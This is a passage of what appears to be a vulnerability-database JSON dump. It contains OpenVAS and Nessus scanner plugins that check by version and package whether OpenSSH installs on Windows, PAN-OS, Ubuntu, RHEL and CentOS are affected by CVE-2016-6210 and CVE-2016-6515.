script_version(\"2019-05-21T12:48:06+0000\");\n script_cve_id(\"CVE-2016-6515\", \"CVE-2016-6210\");\n script_bugtraq_id(92212);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-21 12:48:06 +0000 (Tue, 21 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-08-18 10:29:27 +0530 (Thu, 18 Aug 2016)\");\n script_name(\"OpenSSH Denial of Service And User Enumeration Vulnerabilities (Windows)\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_openssh_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"openssh/detected\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"http://www.openssh.com/txt/release-7.3\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2016/Jul/51\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-6210\");\n script_xref(name:\"URL\", value:\"http://openwall.com/lists/oss-security/2016/08/01/2\");\n\n script_tag(name:\"summary\", value:\"This host is installed with openssh and\n is prone to denial of service and user enumeration vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - The auth_password function in 'auth-passwd.c' script does not limit password\n lengths for password authentication.\n\n - The sshd in OpenSSH, when SHA256 or SHA512 are used for user password hashing\n uses BLOWFISH hashing on a static password when the username does not exist\n and it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows\n remote attackers to cause a denial of service (crypt CPU consumption) and\n to enumerate users by leveraging the timing difference between responses\n when a large password is provided.\");\n\n script_tag(name:\"affected\", value:\"OpenSSH versions before 7.3 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenSSH version 7.3 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"7.3\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"7.3\", install_path:path);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-07-25T12:17:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9149", "CVE-2016-6210"], "description": "Palo Alto Networks makes use of a the OpenSSH tool. CVE-2016-6210 was recently confirmed to be applicable to the version in use by PAN-OS.", "modified": "2019-07-24T00:00:00", "published": "2016-11-21T00:00:00", "id": "OPENVAS:1361412562310140073", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140073", "type": "openvas", "title": "Palo Alto PAN-OS OpenSSH Vulnerability (PAN-SA-2016-0036)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Palo Alto PAN-OS OpenSSH Vulnerability (PAN-SA-2016-0036)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:paloaltonetworks:pan-os';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140073\");\n script_cve_id(\"CVE-2016-9149\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:P/A:N\");\n script_version(\"2019-07-24T08:39:52+0000\");\n\n script_name(\"Palo Alto PAN-OS OpenSSH Vulnerability (PAN-SA-2016-0036)\");\n\n script_xref(name:\"URL\", value:\"https://securityadvisories.paloaltonetworks.com/Home/Detail/69\");\n\n script_tag(name:\"summary\", value:\"Palo Alto Networks makes use of a the OpenSSH tool. CVE-2016-6210 was recently confirmed to be applicable to the version in use by PAN-OS.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"solution\", value:\"Update to PAN-OS 6.0.15 and later, PAN-OS 6.1.15 and later, PAN-OS 7.0.11 and later, PAN-OS 7.1.6 and later\");\n\n script_tag(name:\"affected\", value:\"PAN-OS 5.0.X and earlier, PAN-OS 5.1.X and earlier, PAN-OS 6.0.14 and earlier, PAN-OS 6.1.14 and earlier, PAN-OS 7.0.10 and earlier, PAN-OS 7.1.5 and earlier\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"last_modification\", value:\"2019-07-24 08:39:52 +0000 (Wed, 24 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-11-21 11:15:25 +0100 (Mon, 21 Nov 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Palo Alto PAN-OS Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_palo_alto_panOS_version.nasl\");\n script_mandatory_keys(\"palo_alto_pan_os/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE, nofork:TRUE ) ) exit( 0 );\n\nmodel = get_kb_item( \"palo_alto_pan_os/model\" );\n\nif( version =~ \"^5\\.0\" )\n fix = '6.0.15';\nelse if( version =~ \"^5\\.1\" )\n fix = '6.0.15';\nelse if( version =~ \"^6\\.0\" )\n fix = '6.0.15';\nelse if( version =~ \"^6\\.1\" )\n fix = '6.1.15';\nelse if( version =~ \"^7\\.0\" )\n fix = '7.0.11';\nelse if( version =~ \"^7\\.1\" )\n fix = '7.1.6';\n\nif( ! fix ) exit( 0 );\n\nif( version_is_less( version:version, test_version:fix ) )\n{\n report = 'Installed version: ' + version + '\\n' +\n 'Fixed version: ' + fix;\n\n if( model )\n report += '\\nModel: ' + model;\n\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6515", "CVE-2016-6210"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-08-16T00:00:00", "id": "OPENVAS:1361412562310842862", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842862", "type": "openvas", "title": "Ubuntu Update for openssh USN-3061-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for openssh USN-3061-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842862\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-16 05:43:08 +0200 (Tue, 16 Aug 2016)\");\n script_cve_id(\"CVE-2016-6210\", \"CVE-2016-6515\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for openssh USN-3061-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Eddie Harari discovered that OpenSSH\n incorrectly handled password hashing when authenticating non-existing users.\n A remote attacker could perform a timing attack and enumerate valid users.\n (CVE-2016-6210)\n\nTomas Kuthan, Andres Rojas, and Javier Nieto discovered that OpenSSH did\nnot limit password lengths. A remote attacker could use this issue to cause\nOpenSSH to consume resources, leading to a denial of service.\n(CVE-2016-6515)\");\n script_tag(name:\"affected\", value:\"openssh on Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3061-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3061-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:6.6p1-2ubuntu2.8\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:5.9p1-5ubuntu1.10\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:7.2p2-4ubuntu2.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:08:28", "description": "An update for openssh is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)", "edition": 26, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-01T00:00:00", "title": "RHEL 6 : openssh (RHSA-2017:2563)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:openssh", "p-cpe:/a:redhat:enterprise_linux:openssh-askpass", "p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openssh-ldap", "p-cpe:/a:redhat:enterprise_linux:openssh-clients", "p-cpe:/a:redhat:enterprise_linux:openssh-server", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth"], "id": "REDHAT-RHSA-2017-2563.NASL", "href": "https://www.tenable.com/plugins/nessus/102909", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:2563. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102909);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2016-6210\");\n script_xref(name:\"RHSA\", value:\"2017:2563\");\n\n script_name(english:\"RHEL 6 : openssh (RHSA-2017:2563)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for openssh is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:2563\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6210\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:2563\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssh-askpass-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openssh-askpass-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssh-askpass-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openssh-debuginfo-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssh-ldap-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openssh-ldap-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssh-ldap-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"pam_ssh_agent_auth-0.9.3-123.el6_9\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-askpass / openssh-clients / openssh-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T09:31:37", "description": "An update for openssh is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)", "edition": 28, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-01T00:00:00", "title": "CentOS 6 : openssh (CESA-2017:2563)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "modified": "2017-09-01T00:00:00", "cpe": ["p-cpe:/a:centos:centos:openssh-ldap", "p-cpe:/a:centos:centos:openssh", "p-cpe:/a:centos:centos:openssh-server", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:openssh-clients", "p-cpe:/a:centos:centos:openssh-askpass", "p-cpe:/a:centos:centos:pam_ssh_agent_auth"], "id": "CENTOS_RHSA-2017-2563.NASL", "href": "https://www.tenable.com/plugins/nessus/102885", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:2563 and \n# CentOS Errata and Security Advisory 2017:2563 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102885);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-6210\");\n script_xref(name:\"RHSA\", value:\"2017:2563\");\n\n script_name(english:\"CentOS 6 : openssh (CESA-2017:2563)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for openssh is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-August/022529.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1cc50be7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-6210\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pam_ssh_agent_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssh-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssh-askpass-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssh-clients-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssh-ldap-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssh-server-5.3p1-123.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"pam_ssh_agent_auth-0.9.3-123.el6_9\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-askpass / openssh-clients / openssh-ldap / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T12:51:45", "description": "From Red Hat Security Advisory 2017:2563 :\n\nAn update for openssh is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)", "edition": 25, "cvss3": {"score": 5.9, "vector": 